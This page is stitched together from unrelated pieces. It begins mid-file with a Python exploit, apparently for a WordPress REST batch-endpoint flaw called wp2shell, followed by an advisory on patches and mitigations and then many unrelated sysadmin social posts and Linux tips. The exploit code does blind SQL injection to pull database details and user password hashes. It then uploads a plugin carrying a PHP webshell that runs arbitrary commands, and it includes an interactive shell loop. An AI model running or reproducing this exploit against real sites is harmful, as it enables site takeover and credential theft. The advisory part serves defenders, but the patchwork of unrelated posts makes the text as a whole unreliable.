print(f"[+] {msg}")
def _bad(msg: str) -> None:
print(f"[-] {msg}")
def _warn(msg: str) -> None:
print(f"[!] {msg}")
# --- HTTP Client ---
class TargetError(Exception):
pass
dataclass
class Response:
status: int
elapsed: float
body: str
def json(self) -> Any:
return json.loads(self.body)
class BatchClient:
def __init__(self, base_url: str, *, timeout: float = 30.0, rest_route: bool = False, proxy: Optional[str] = None, user_agent: str = "wp2shell"):
self.base_url = base_url.rstrip("/")
self.timeout = timeout
self.rest_route = rest_route
self.user_agent = user_agent
handlers = [urllib.request.ProxyHandler({"http": proxy, "https": proxy})] if proxy else []
self._opener = urllib.request.build_opener(*handlers)
property
def endpoint(self) -> str:
if self.rest_route:
return f"{self.base_url}/?rest_route=/batch/v1"
return f"{self.base_url}/wp-json/batch/v1"
def post(self, payload: dict) -> Response:
request = urllib.request.Request(self.endpoint, data=json.dumps(payload).encode(), method="POST", headers={"Content-Type": "application/json", "User-Agent": self.user_agent})
start = time.monotonic()
try:
resp = self._opener.open(request, timeout=self.timeout)
status, body = resp.status, resp.read().decode("utf-8", "replace")
except urllib.error.HTTPError as exc:
status, body = exc.code, exc.read().decode("utf-8", "replace")
except OSError as exc:
raise TargetError(f"cannot reach {self.endpoint}: {getattr(exc, 'reason', exc)}") from None
return Response(status, time.monotonic() - start, body)
def get(self, path: str) -> Response:
url = self.base_url + (path if path.startswith("/") else f"/{path}")
request = urllib.request.Request(url, method="GET", headers={"User-Agent": self.user_agent})
start = time.monotonic()
try:
resp = self._opener.open(request, timeout=self.timeout)
status, body = resp.status, resp.read().decode("utf-8", "replace")
except urllib.error.HTTPError as exc:
status, body = exc.code, exc.read().decode("utf-8", "replace")
except OSError as exc:
raise TargetError(f"cannot reach {url}: {getattr(exc, 'reason', exc)}") from None
return Response(status, time.monotonic() - start, body)
def marker_probe(self) -> Response:
return self.post({"requests": [_DESYNC_PRIMER, {"method": "POST", "path": "/wp/v2/posts"}, {"method": "POST", "path": "/wp/v2/block-renderer/core/archives"}, {"method": "POST", "path": "/batch/v1", "body": {"requests": []}}]})
staticmethod
def batch_marker_codes(response: Response) -> tuple:
try:
body = response.json()
except ValueError:
return ()
found = []
def walk(value) -> None:
if isinstance(value, dict):
code = value.get("code")
if code in _BATCH_MARKER_CODES and code not in found:
found.append(code)
for child in value.values():
walk(child)
elif isinstance(value, list):
for child in value:
walk(child)
walk(body)
return tuple(found)
staticmethod
def has_route_confusion_markers(response: Response) -> bool:
codes = BatchClient.batch_marker_codes(response)
return all(code in codes for code in _BATCH_MARKER_CODES)
def inject(self, author_not_in: str) -> Response:
return self.post(self._payload(author_not_in))
def rows(self, response: Response) -> Optional[list]:
try:
inner = response.json()["responses"][1]["body"]
result = inner["responses"][1]["body"]
except (KeyError, IndexError, TypeError, ValueError):
return None
return result if isinstance(result, list) else None
staticmethod
def _payload(author_not_in: str) -> dict:
inner = {"requests": [_DESYNC_PRIMER, {"method": "GET", "path": "/wp/v2/users?author_exclude=" + urllib.parse.quote(author_not_in, safe="")}, {"method": "GET", "path": "/wp/v2/posts"}]}
return {"requests": [_DESYNC_PRIMER, {"method": "POST", "path": "/wp/v2/posts", "body": inner}, {"method": "POST", "path": "/batch/v1", "body": {"requests": []}}]}
# --- SQLi Logic ---
dataclass
class TimingConfirmation:
confirmed: bool
baseline: float
delayed: float
delta: float
threshold: float
samples: Tuple[Tuple[float, float], ...]
class BlindSQLi:
def __init__(self, client: BatchClient, *, sleep: float = 3.0) -> None:
self.client = client
self.sleep = sleep
self.requests = 0
def confirm_timing(self, *, samples: int = 3) -> TimingConfirmation:
pairs = []
for _ in range(samples):
baseline = self._elapsed("SLEEP(0)")
delayed = self._elapsed(f"SLEEP({self.sleep:g})")
pairs.append((baseline, delayed))
baselines = [pair[0] for pair in pairs]
delayed = [pair[1] for pair in pairs]
deltas = [delay - base for base, delay in pairs]
baseline_median = statistics.median(baselines)
delayed_median = statistics.median(delayed)
delta_median = statistics.median(deltas)
threshold = max(0.75, self.sleep * 0.65)
return TimingConfirmation(confirmed=delta_median >= threshold, baseline=baseline_median, delayed=delayed_median, delta=delta_median, threshold=threshold, samples=tuple(pairs))
def extract(self, expression: str, *, max_length: int = 128, on_char: Optional[Callable[[str], None]] = None) -> str:
chars = []
for position in range(1, max_length + 1):
probe = f"ASCII(SUBSTRING(COALESCE(({expression}),''),{position},1))"
if not self._true(f"{probe} > 0"):
break
low, high = 32, 126
while low < high:
mid = (low + high) // 2
if self._true(f"{probe} > {mid}"):
low = mid + 1
else:
high = mid
chars.append(chr(low))
if on_char:
on_char("".join(chars))
return "".join(chars)
def integer(self, expression: str) -> int:
text = self.extract(expression).strip()
return int(text) if text.lstrip("-").isdigit() else 0
def _elapsed(self, sql: str) -> float:
self.requests += 1
return self.client.inject(f"0) OR {sql}-- -").elapsed
def _true(self, condition: str) -> bool:
self.requests += 1
return bool(self.client.rows(self.client.inject(f"0) AND ({condition})-- -")))
# --- Post-Auth Shell Logic ---
class AdminSession:
def __init__(self, base_url: str, *, timeout: float = 20.0, proxy: Optional[str] = None):
self.base_url = base_url.rstrip("/")
self.timeout = timeout
self._slug = "wp2shell_" + secrets.token_hex(4)
self._token = secrets.token_hex(16)
self._jar = http.cookiejar.CookieJar()
handlers = [urllib.request.HTTPCookieProcessor(self._jar)]
if proxy:
handlers.append(urllib.request.ProxyHandler({"http": proxy, "https": proxy}))
self._opener = urllib.request.build_opener(*handlers)
self._opener.addheaders = [("User-Agent", "wp2shell")]
def login(self, username: str, password: str) -> bool:
self._get("/wp-login.php")
self._post("/wp-login.php", {"log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": f"{self.base_url}/wp-admin/", "testcookie": "1"})
return any(c.name.startswith("wordpress_logged_in") for c in self._jar)
def deploy_webshell(self) -> str:
page = self._get("/wp-admin/plugin-install.php?tab=upload")
nonce = self._nonce(page)
if not nonce:
raise RuntimeError("plugin-upload nonce not found (are the credentials valid?)")
body, content_type = self._multipart({"_wpnonce": nonce, "_wp_http_referer": "/wp-admin/plugin-install.php?tab=upload", "install-plugin-submit": "Install Now"}, {"pluginzip": (f"{self._slug}.zip", self._plugin_zip())})
self._post("/wp-admin/update.php?action=upload-plugin", body, {"Content-Type": content_type})
return f"/wp-content/plugins/{self._slug}/{self._slug}.php"
def run(self, shell_path: str, command: str) -> Optional[str]:
query = urllib.parse.urlencode({"t": self._token, "c": command})
output = self._get(f"{shell_path}?{query}")
match = re.search(r"WP2SHELL::(.*?)::END", output, re.S)
return match.group(1) if match else None
def _get(self, path: str) -> str:
return self._opener.open(self.base_url + path, timeout=self.timeout).read().decode("utf-8", "replace")
def _post(self, path: str, data, headers: Optional[dict] = None) -> str:
if isinstance(data, dict):
data = urllib.parse.urlencode(data).encode()
request = urllib.request.Request(self.base_url + path, data=data, headers=headers or {})
return self._opener.open(request, timeout=self.timeout).read().decode("utf-8", "replace")
def _plugin_zip(self) -> bytes:
php = f"<?php\n/* Plugin Name: WP2Shell */\nif (isset($_GET['t']) && $_GET['t'] === '{self._token}' && isset($_GET['c'])) {{\n chdir(dirname(__DIR__));\n echo 'WP2SHELL::' . shell_exec($_GET['c']) . '::END';\n exit;\n}}\n"
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as zf:
zf.writestr(f"{self._slug}.php", php)
return buffer.getvalue()
def _nonce(self, html: str) -> Optional[str]:
form = re.search(r'action="[^"]*action=upload-plugin".*?name="_wpnonce"[^>]*value="([0-9a-f]+)"', html, re.S)
if form:
return form.group(1)
tag = re.search(r'[^>]*name="_wpnonce"[^>]*value="([0-9a-f]+)"', html)
return tag.group(1) if tag else None
staticmethod
def _multipart(fields: Dict[str, str], files: Dict[str, Tuple[str, bytes]]) -> Tuple[bytes, str]:
boundary = "----wp2shell" + uuid.uuid4().hex
buffer = io.BytesIO()
for name, value in fields.items():
buffer.write(f"--{boundary}\r\n".encode())
buffer.write(f'Content-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'.encode())
for name, (filename, content) in files.items():
buffer.write(f"--{boundary}\r\n".encode())
buffer.write(f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n'.encode())
buffer.write(b"Content-Type: application/octet-stream\r\n\r\n" + content + b"\r\n")
buffer.write(f"--{boundary}--\r\n".encode())
return buffer.getvalue(), f"multipart/form-data; boundary={boundary}"
# --- CLI ---
def main() -> int:
parser = argparse.ArgumentParser(description="wp2shell-poc (CVE-2026-63030)")
subparsers = parser.add_subparsers(dest="command", required=True)
p_check = subparsers.add_parser("check", help="Confirm vulnerability")
p_check.add_argument("url")
p_check.add_argument("--rest-route", action="store_true")
p_check.add_argument("--proxy")
p_check.add_argument("--timeout", type=float, default=30.0)
p_check.add_argument("--sleep", type=float, default=3.0)
p_check.add_argument("--samples", type=int, default=3)
p_check.add_argument("--confirm-sqli", action="store_true")
p_read = subparsers.add_parser("read", help="Extract data via blind SQLi")
p_read.add_argument("url")
p_read.add_argument("--rest-route", action="store_true")
p_read.add_argument("--proxy")
p_read.add_argument("--timeout", type=float, default=30.0)
p_read.add_argument("--preset", choices=["fingerprint", "users"])
p_read.add_argument("--query")
p_read.add_argument("--prefix", default="wp_")
p_read.add_argument("--max-length", type=int, default=128)
p_shell = subparsers.add_parser("shell", help="Post-auth plugin webshell helper")
p_shell.add_argument("url")
p_shell.add_argument("--user", required=True)
p_shell.add_argument("--password", required=True)
p_shell.add_argument("--proxy")
p_shell.add_argument("--timeout", type=float, default=30.0)
p_shell.add_argument("--cmd")
p_shell.add_argument("-i", "--interactive", action="store_true")
p_shell.add_argument("--cleanup", action="store_true")
args = parser.parse_args()
if args.command == "check":
client = BatchClient(args.url, timeout=max(args.timeout, args.sleep + 10), rest_route=args.rest_route, proxy=args.proxy)
probe = client.marker_probe()
if probe.status != 207:
_bad(f"Batch endpoint returned HTTP {probe.status} (not 207) — patched or REST API disabled.")
return 1
markers = client.batch_marker_codes(probe)
if markers:
_info(f"Batch probe -> HTTP 207; markers matched: {', '.join(markers)}")
else:
_good("Batch endpoint reachable and unauthenticated (HTTP 207).")
if client.has_route_confusion_markers(probe):
_good("VULNERABLE — batch route-confusion behavior detected.")
if not args.confirm_sqli:
_info("SQL timing confirmation not sent; use --confirm-sqli for the active SQLi probe.")
return 0
else:
_bad("Route-confusion marker pattern not detected.")
return 2
result = BlindSQLi(client, sleep=args.sleep).confirm_timing(samples=args.samples)
if args.samples > 1:
details = ", ".join(f"{base:.2f}s->{delay:.2f}s" for base, delay in result.samples)
_info(f"Timing samples: {details}")
_info(f"Median delta {result.delta:.2f}s; threshold {result.threshold:.2f}s.")
if result.confirmed:
_good(f"SQL timing confirmed — baseline {result.baseline:.2f}s, injected {result.delayed:.2f}s.")
return 0
else:
_warn(f"SQL timing not confirmed — baseline {result.baseline:.2f}s, injected {result.delayed:.2f}s.")
return 2
elif args.command == "read":
client = BatchClient(args.url, timeout=args.timeout, rest_route=args.rest_route, proxy=args.proxy)
sqli = BlindSQLi(client)
if args.query:
_info(f"Reading: {args.query}")
value = sqli.extract(args.query, max_length=args.max_length, on_char=_progress)
_clear_progress()
_good(f"Result: {value}")
elif args.preset == "fingerprint":
for label, expr in (("MySQL version", "SELECT @@version"), ("Database user", "SELECT CURRENT_USER()"), ("Database name", "SELECT DATABASE()")):
_good(f"{label}: {sqli.extract(expr, max_length=args.max_length)}")
elif args.preset == "users":
table = f"{args.prefix}users"
total = sqli.integer(f"SELECT COUNT(*) FROM {table}")
_info(f"{total} user(s) in {table}.")
for offset in range(total):
row = sqli.extract(f"SELECT CONCAT_WS(0x7c, ID, user_login, user_pass) FROM {table} ORDER BY ID LIMIT {offset},1", max_length=args.max_length, on_char=_progress)
_clear_progress()
_good(row)
_info(f"{sqli.requests} request(s) sent.")
return 0
elif args.command == "shell":
if not args.cmd and not args.interactive:
_bad("specify --cmd or --interactive")
return 2
_warn("This uploads a plugin containing a webshell to the target.")
session = AdminSession(args.url, timeout=args.timeout, proxy=args.proxy)
_info(f"Authenticating as {args.user!r}...")
if not session.login(args.user, args.password):
_bad("Login failed. Supply valid admin credentials (crack the hash recovered by 'read').")
return 1
_good("Authenticated.")
_info("Deploying webshell plugin...")
path = session.deploy_webshell()
_good(f"Webshell: {args.url.rstrip('/')}{path}")
rc = 0
if args.cmd:
output = session.run(path, args.cmd)
if output is None:
_bad("No output — the upload likely failed or the plugin is not web-served.")
rc = 1
else:
print(f"\n{output.rstrip()}\n")
if args.interactive:
_info("Interactive shell started. Type 'exit' to quit.")
while True:
try:
cmd = input("wp2shell> ").strip()
if cmd.lower() in ("exit", "quit"):
break
if not cmd:
continue
output = session.run(path, cmd)
print(output if output else "(no output)")
except (EOFError, KeyboardInterrupt):
break
if args.cleanup:
_info("Cleaning up webshell...")
if session.cleanup(path): # Note: cleanup method omitted for brevity in this unified script, but follows same _run pattern
_good("Webshell removed.")
else:
_warn("Cleanup failed. Remove manually.")
return rc
return 0
if __name__ == "__main__":
sys.exit(main())
More PoCs: https://github.com/Icex0/wp2shell-poc
Why SQL Injection Matters
The publicly released proof of concept stops at SQL injection.
Using blind SQLi, researchers showed it is possible to retrieve information such as:
- WordPress usernames
- Password hashes
- Database information
- Server fingerprints
The original researchers have intentionally withheld the final step that transforms database access into unauthenticated code execution.
That decision gives administrators additional time to deploy patches before full exploitation details become public.
Nevertheless, WordPress itself classifies the issue as one capable of leading to Remote Code Execution, indicating the Security Team independently verified the complete attack chain during remediation
Why Forced Updates Matter
WordPress supports automatic background updates, but administrators can disable them.
In this incident, the WordPress project enabled forced security updates for affected versions.
This is an unusual step.
The project generally avoids overriding administrator preferences except when facing vulnerabilities with exceptionally high risk.
The decision itself serves as an indicator of the severity assigned to this flaw.
Administrators should still verify that updates were successfully installed rather than assuming automatic mechanisms completed successfully.
No CVE… Initially
At disclosure, the wp2shell advisory did not include a CVE identifier.
This created an interesting challenge for defenders.
Many enterprise vulnerability scanners rely heavily on:
- CVE identifiers
- CVSS scores
- CISA Known Exploited Vulnerabilities (KEV)
Without a CVE, these systems may fail to alert administrators even though systems remain vulnerable.
WordPress later assigned identifiers to the affected vulnerabilities:
Vulnerability
Identifier
REST API Batch Route Confusion → RCE
CVE-2026-63030 / GHSA-ff9f-jf42-662q
Facilitated SQL Injection
CVE-2026-60137 / GHSA-fpp7-x2x2-2mjf
Organizations should verify patch status based on installed WordPress versions rather than relying solely on vulnerability scanners.
Why Patch Diffing Matters
One reality of open source software is that every security update also exposes the modified source code.
Attackers frequently compare vulnerable and patched versions to determine:
- What changed
- Which validation logic was added
- Which functions were modified
- How to recreate the original vulnerability
This process, commonly called patch diffing, often allows exploits to appear within hours or days of a security release.
While Searchlight Cyber has not released its complete exploit chain, attackers have access to both the vulnerable and fixed WordPress source code.
That significantly reduces the time defenders have available to deploy updates.
Temporary Mitigations
Updating remains the only complete solution.
For organizations unable to patch immediately, several temporary mitigations can reduce exposure.
1. Block REST Batch Requests
Block both endpoints:
/wp-json/batch/v1
and
?rest_route=/batch/v1
Filtering only one path is insufficient because WordPress supports both routing mechanisms.
2. Restrict Anonymous REST Access
Organizations may temporarily disable or authenticate public REST API access where business requirements permit.
Be aware that this may disrupt legitimate integrations and applications relying on REST functionality.
3. Filter Requests Before Dispatch
Custom filters using
rest_pre_dispatchcan reject anonymous requests targeting the batch endpoint until systems are upgraded.Indicators for Administrators
Administrators should immediately verify:
- WordPress version
- Automatic update status
- Web server logs for unusual POST requests to
/wp-json/batch/v1- Requests containing
rest_route=/batch/v1- Unexpected SQL query activity
- Newly created administrator accounts
- Recently installed plugins
Even if exploitation has not yet been publicly observed, early log analysis can reveal attempted reconnaissance.
Security Recommendations
Organizations operating WordPress should:
- Upgrade immediately to WordPress 7.0.2 or 6.9.5
- Verify automatic updates completed successfully
- Block REST batch endpoints if patching must be delayed
- Monitor logs for suspicious batch API requests
- Review administrator accounts and installed plugins
- Continue monitoring for additional indicators as researchers publish more technical details
FAQs
What is the WordPress wp2shell vulnerability?
wp2shell is a critical WordPress core vulnerability that can allow unauthenticated attackers to execute code on vulnerable WordPress 6.9.x and 7.0.x websites.
Which WordPress versions are affected?
WordPress versions 6.9.0 through 6.9.4 and 7.0.0 through 7.0.1 are affected. The issue is fixed in versions 6.9.5 and 7.0.2.
Does the vulnerability affect websites without plugins?
Yes. The vulnerability exists in WordPress core and can affect default installations with no plugins or custom themes.
Has the vulnerability been assigned a CVE?
Yes. The affected security issues are tracked as CVE-2026-63030 (REST API batch-route confusion leading to RCE) and CVE-2026-60137 (facilitated SQL injection).
How can I protect my WordPress site?
Update immediately to WordPress 7.0.2 or 6.9.5, verify your site version, and temporarily block access to the
/wp-json/batch/v1endpoint if immediate patching is not possible.Final Thoughts
wp2shell is one of the most significant WordPress core vulnerabilities disclosed in recent years. Its impact stems not only from the possibility of remote code execution, but also from how little an attacker needs to exploit it. A default installation with no plugins, no customizations, and no authentication can still be exposed if it remains unpatched.
The WordPress project’s decision to push emergency updates automatically underscores the seriousness of the issue. While researchers have intentionally withheld the complete exploit chain, history suggests that patch diffing and independent analysis will likely produce public exploit code in the near future.
For defenders, the window for proactive remediation is measured in days rather than weeks. Administrators should verify their WordPress version, confirm that security updates have been applied successfully, and review logs for suspicious requests targeting the REST Batch API. In situations like this, prompt patching remains the most effective defense.
Credits to – wp2shell.com
A software vendor's sysadmin asked me to verify whether a configuration file existed and whether the path was correct.
I had already sent this:
root@server:/home/application/WEB-INF/classes/initscripts# ls -l
...
-rwxr-xr-x 1 app app 56 Jul 13 12:03 Security.config
root@server:/home/application/WEB-INF/classes/initscripts# cat Security.config
m_currentAuthentication=authenticationuser.Authenticate
The reply was:
> Could you send me a screenshot, so I can check whether the path is correct and the file is there?
The shell prompt contains the full path.
ls shows that the file exists.
cat shows its contents.
One would have thought this was reasonably conclusive, but apparently plain text remains an unverified hypothesis until photographed.
At this point, a modern AI would probably hallucinate less.
This is the second post where you'd dropped the F bomb....for good reason.
I have so much to say but not sure how to say it but I will do my best. For *years*, I've enjoyed using #Linux both as a hobbyist and professional #sysadmin. The OS is definitely not the one I started with 20+ years ago. Since at least COVID has....well, it's turned into a full blown corporate-controlled high speed sprawling mess. Not necessarily matured just grown exponentially wherever the various powers see fit. For this and other reasons, I am leaning more and more towards #FreeBSD.
Lastly, I will admit there are some #AI niche use cases which do interest me (related to my own hobbies) but shoving it into everything is not a good idea.
On 10 March 2021, I had only just fallen asleep when my phone started buzzing. Then another notification, and another. In a matter of minutes, 142 of my servers went up in the clouds. And not the cloud-computing kind.
Most of them were physically going up in a column of smoke in Strasbourg.
My wife looked at me and asked if I wanted a coffee. I nodded. It was going to be a very long day.
At EuroBSDCon 2026, I won't be giving a theoretical lecture on high availability. Instead, I’m going to tell the raw story of that night: the emergency recovery, the architectural choices that actually saved us, and the ones that crumbled under pressure (because we rarely talk about what fails).
Most of all, I’ll explain why that night changed my perspective, and why I’ve come to see BSD systems not just as operating systems, but as essential, practical tools for building simpler, more resilient infrastructure.
The official schedule is now live. If you want to hear a real-world post-mortem, join me on Saturday, 12 Sept at 11:15 (Room D.0.02).
EuroBSDCon Full schedule: https://events.eurobsdcon.org/2026/schedule/
See you there! ☕️
#FreeBSD #NetBSD #OpenBSD #DragonFlyBSD #RunBSD #EuroBSDCon #SysAdmin #SelfHosted #IT #EuroBSDCon2026 #BSDCon
Linux tip: `fuser -v /path/to/file` shows which processes have a file open. Use `-k` to kill those processes when "device busy" errors prevent unmounting filesystems. #Linux #SystemAdministration #SysAdmin
I, for one, appreciate the re-addition of RJ45 sockets on laptops.
Thank you for your attention in this matter.
When I was younger, I was expecting systems to work all of the time and I was really angry when it was failing.
Now, I’m expecting that a system will fail after some time and I try to :
Today, it paid off : I got a strange network issue on one of my hypervisors and I was able to reboot the thing using a remote KVM and my VPN, while I was in a train! #lifeasasysadmin #sysadmin
Version-control every configuration change. Use git even for single files. When something breaks, you can see exactly what changed and when. Your future self will be grateful. #Linux #SystemAdministration #SysAdmin #Coding
Linux tip: `ionice -c 3 command` runs a command with idle I/O priority. It only gets disk access when no other processes need it. Perfect for backups or maintenance tasks. #Linux #SystemAdministration #SysAdmin #Performance
Hier wie #Hermes meine Linux-Systeme (Linuxe und Linuxinas) automatisch aktuell hält
Nächtliches Server-Checkup als Best Practice Blueprint
Zwei-Phasen-Architektur mit strikt getrennten Verantwortlichkeiten:
PHASE 1 — DATENSAMMLUNG (System-Cron, 01:00)
Bash-Script, kein LLM. Führt alle Checks sequentiell aus und schreibt das Ergebnis in ein versioniertes Logfile (check_YYMMDD.log). Log-Rotation automatisch (30 Tage). Jedes Modul darf einzeln fehlschlagen ohne den gesamten Check abzubrechen.
PHASE 2 — BENACHRICHTIGUNG (Hermes-Cron, 02:00)
Python-Parser, kein LLM. Liest das Logfile deterministisch ein, baut einen kompakten Report, generiert automatische Alerts bei Schwellwert-Überschreitungen. Das Script-stdout wird 1:1 als Telegram-Nachricht zugestellt. Hermes startet keinen Agent-Loop — reiner Cron-to-Telegram-Bridge.
DESIGN-PRINZIPIEN
1. Decoupling: Checks laufen über System-Cron, nicht über den Bot. Fällt der Bot aus, liegen die Logs trotzdem bereit. Bot ist nur der Zusteller.
2. Deterministisch: Der Report wird von einem Python-Script geparst, nicht von einem LLM generiert. Keine API-Kosten, keine Halluzinationen, garantiert gleiches Format jeden Tag.
3. Asynchroner Versatz: Phase 2 startet 1h nach Phase 1 — das Logfile ist sicher vollständig, keine Locking-Mechanismen nötig.
4. Logfile als Schnittstelle: Der einzige Kontaktpunkt zwischen den Phasen. Versioniert, rotiert, manuell inspectable, kann jederzeit nachträglich geparst werden.
CHECK-DOMÄNEN
- Storage: SMART, Temperaturen, Verschleiß, Mount-Health
- Hardware: CPU/Sensor-Temperaturen, NVMe-Wear
- Pool: Kapazität, Auslastung, Merge-Status
- Identität: AD/Domänen-Anbindung, Trust, User-Sichtbarkeit
- Backup: Client installiert, Server erreichbar, letztes Backup
- Updates: Ausstehende Pakete, Reboot-Required
- Self-Update: Eigener Agent auf aktuellem Stand
- Prävention: Proaktiver Remount von Fuse-Pools (nicht nur bei Ausfall)
ALERTING
Zwei Lagen: 🔴 Alerts bei echten Problemen (SMART FAILED, AD offline, Reboot nötig). ℹ️ Hinweise bei Auffälligkeiten ohne akuten Handlungsbedarf. Keine Alerts = "Alle Systeme unauffällig."
WATCHDOG-PATTERN
Zusätzlich zum nächtlichen Check läuft ein Watchdog-Cronjob (alle 30 Min) für kritische Komponenten. Silent bei Gesundheit (0 Byte stdout = keine Nachricht, keine Notification-Fatigue). Bei Ausfall: Selbstheilung (z.B. Remount) + Telegram-Alert.
WARUM DAS FUNKTIONIERT
- Ausfallsicher: Jede Komponente kann einzeln ausfallen, alles degradiert graceful
- Kostenlos: Kein einziger LLM-Call in der Pipeline
- Reproduzierbar: Logfile + Parser = deterministischer Report
- Präventiv: Fuse-Pools werden proaktiv remounted, nicht erst bei User-Beschwerden
- Auditierbar: 30 Tage Logfile-Historie liegen lokal
Linux tip: `pidof process_name` returns process IDs by name. Unlike `pgrep`, it matches only the command name, not arguments. Use in scripts where you need exact process name matching. #Linux #SystemAdministration #SysAdmin
Dealt with a lovely and very helpful third-party support person for a client's E-mail and once again was reminded why I don't use #Office365 for E-mail. What a nightmare to administer. Bear in mind, I'm still running a couple medium sized #qmail servers.
As I type this, Office365 still isn't letting us send E-mail but I'm sure we'll get there.
Linux tip: `strace -e trace=file program` traces only file-related system calls. Add `-o output.txt` to save results. Reveals which config files, libraries, or data files your program actually accesses. #Linux #SystemAdministration #SysAdmin
mal wieder ein use case par excellence für #hermes_agent unter linux:
unter #windows wurden keine ordner angezeigt trotz gesetzter acls
LÖSUNG
FUSE default_permissions bricht POSIX ACLs — und niemand merkt's
Setup: Ubuntu Fileserver, Samba/Winbind in AD-Domäne, Storage-Pool via mergerfs (FUSE). POSIX ACLs korrekt gesetzt — group:bs_alle:r-x auf /srv/storage/Mitarbeiter. User ist in bs_alle. Ext4 direkt: Zugriff klappt. Über mergerfs: Permission denied.
Symptom: test -r sagt OK, ls sagt denied. Windows-ACLs korrekt, Samba-ACLs korrekt, ext4-ACLs korrekt. Nichts zu finden.
Root cause: FUSE default_permissions wird vom Kernel-Modul geprüft — und der kennt nur owner/group/other, keine named POSIX ACLs. group:bs_alle:r-x wird ignoriert. group::--- (base group) greift → DENY. mergerfs setzt default_permissions implizit bei allow_other, ohne dass's in der fstab steht.
Fix: mergerfs ≥ 2.41.0 hat default_permissions=false als Option (PR #1448). Damit macht mergerfs selbst ACL-aware Permission-Checks im Userspace (posix_acl=true). mergerfs 2.42.0 installiert, fstab angepasst, remount — 15 Sekunden Downtime. ACLs greifen, Security intakt.
Lektion: FUSE default_permissions und POSIX ACLs sind inkompatibel. Wenn ihr FUSE-Mounts mit ACL-basierten Permissions habt — checkt das.
Linux tip: `systemd-analyze blame` shows which services slow down boot time. Use `systemd-analyze critical-chain` to see the dependency chain causing delays. Optimize the real bottlenecks. #Linux #SystemAdministration #SysAdmin
Quand tu relances ton cluster Proxmox et que ton serveur Gotify se transforme en sapin de Noël ! 🎄✨
Le doux bruit des services qui reviennent à la vie les uns après les autres... Uptime-Kuma et Watchtower sont au taquet ! Y a pas à dire, ça fait toujours plaisir de voir tout ce beau monde repasser au vert 🟢💪
Et chez vous, ça donne quoi le monitoring après un reboot ? 🚀
#SelfHosted #Proxmox #SysAdmin #Gotify #UptimeKuma #Docker #OpenSource #Homelab
Updated Debian Linux version 13: 13.6 has been released. If you regularly update your system using the APT you will get these updates but you may have to schedule system reboots.
I have been using aptitude since forever. Today, however, I needed to search through installed packages and remembered just how unintuitive the syntax is!
A few articles deep I learnt that good old apt-get has a new API through apt and it appears to be designed for clarity and ease of use. Should I switch?
Which tool do you use? If there is a specific reason besides habit I would be very curious to hear it!
#debian #apt #aptitude #aptget #packageManagement #linux #software #sysadmin
| aptitude: | 3 |
| apt: | 21 |
| apt-get: | 2 |
| dpkg: | 0 |
Haack's Networking
✍️ Starting today at 5pm UTC-06/7, the following instances will go down for maintenance:
1) gnulinux.studio
2) gnulinux.media
👀 This maintenance will reduce total core consumption on the host by 8 vCPUs and reduce RAM usage by 16GB. Furthermore, these instances will switch from testing to production usage and public availability.
‼️It is expected that this transition should only take 6-12 hours, however, it could take as long as 72 hours if DNS caching gets delayed. Prepare for down time accordingly.
#sysadmin #selfhosted #linux #freesoftware #opensource #navidrome #jellyfin
RE: https://gnulinux.social/@oemb1905/116818157162562628
Just a heads up that this was delayed due to a foot injury that went from okay to terrible very quickly. We are resuming this project today and it should take roughly 48-72 hours to complete.
#navidrome #jellyfin #selfhosted #debian #floss #linux #opensource #freesoftware #sysadmin
Haack's Networking
![]()
✍️ Starting today at 5pm UTC-06/7, the following instances will go down for maintenance:
1) gnulinux.studio
2) gnulinux.media👀 This maintenance will reduce total core consumption on the host by 8 vCPUs and reduce RAM usage by 16GB. Furthermore, these instances will switch from testing to production usage and public availability.
‼️It is expected that this transition should only take 6-12 hours, however, it could take as long as 72 hours if DNS caching gets delayed. Prepare for down time accordingly.
#sysadmin #selfhosted #linux #freesoftware #opensource #navidrome #jellyfin
Trying running my office on wireless. Things connect, but seemed laggy compared to the dmarc. Speedtest.net is not a great way to test connectivity, but performing two consecutive tests against the same server is a reasonable test.
Mac Studio wifi: 18mbs down, 16 up. Good enough to work, but I'm paying for 300mbs.
Mac Studio ethernet to Mikrotik wifi bridge: 210mbs down, 200 up.
Sigh. Apparently I'm back on my Redundant Array of Inexpensive Crap kick. #sysadmin
A good #sysadmin article on how to tell if AI scrapers are eating your bandwidth.
https://bunny.net/blog/how-to-tell-if-scrapers-are-eating-your-bandwidth/
Coté Source :
~614 487 IP sources : rappel, on est sûr du logiciel NON grand publique, un peu niche avec zéro contribution de dev externe a l'entreprise, ce qui est normale.
Si j'enlève les IP de l'infra (monitoring, jenkins, redmine) on enlève ~630 000 requêtes pour 6 IPs.
reste 2 500 000 requêtes et 614 481 IPs ...
~ 582 000 IPs, on fait moins de 10 requêtes (pour un total de 1754808 requêtes soit plus de 50%) dans les détails :
~ 257 998 IPs, on fait une seule requête pour un total de 257998.
36395 IPs, on fait seulement 2 requêtes pour un total de 72790
125627 IPs, on fait seulement 3 requêtes pour un total de 376881
28233 IPs, on fait seulement 4 requêtes pour un total de 112932
15122 IPs, on fait seulement 5 requêtes pour un total de 75610
60216 IPs, on fait seulement 6 requêtes pour un total de 361296
sinon on est ~ une trentaine (et pas tous dev) et en ce lundi de juillet, les bureaux parisiens (ou il y a pas grand monde ~ 3 personnes) ont fait environ 800 requêtes...
donc l'usage "légitime" sur la journée doit être ~ 30 000 requêtes (évaluation haute) soit 1% de l'usage. (bon l'infra compte pour 20% quand même 🙂 )
bref, on n'est pas sur les mêmes chiffres, mais on dépasse largement ton test.
Plusieurs point : l'url du git est ancienne (depuis plus de 10 ans) il y a eu quelques changements, mais globalement ce sont les mêmes urls.
De toute façon, c'est seulement depuis moins de 2 ans qu'on a un nombre de requêtes aussi importantes. Au point de déclencher des erreurs sur le monitoring et d'empêcher l'usage correct de la plateforme.
Je pense que les robots ne sont pas ceux des moteurs de recherche, ils ne parcourent pas internet à la recherche de page a indexé, mais plutôt des robots qui ciblent des URLS particulières " à forte valeur ajoutée" (des urls de code opensource accessible, super pour alimenter des IAs de code).
Linux tip: `iostat -x 1` monitors disk I/O performance every second. Watch the `%util` column - consistently high values indicate I/O bottlenecks. Press Ctrl+C to stop monitoring. #Linux #Performance #SystemAdministration #SysAdmin
Linux tip: `ss -s` provides socket statistics summary. Shows TCP/UDP connection counts and states. Much faster than parsing full socket lists when you just need connection metrics. #Linux #SystemAdministration #SysAdmin
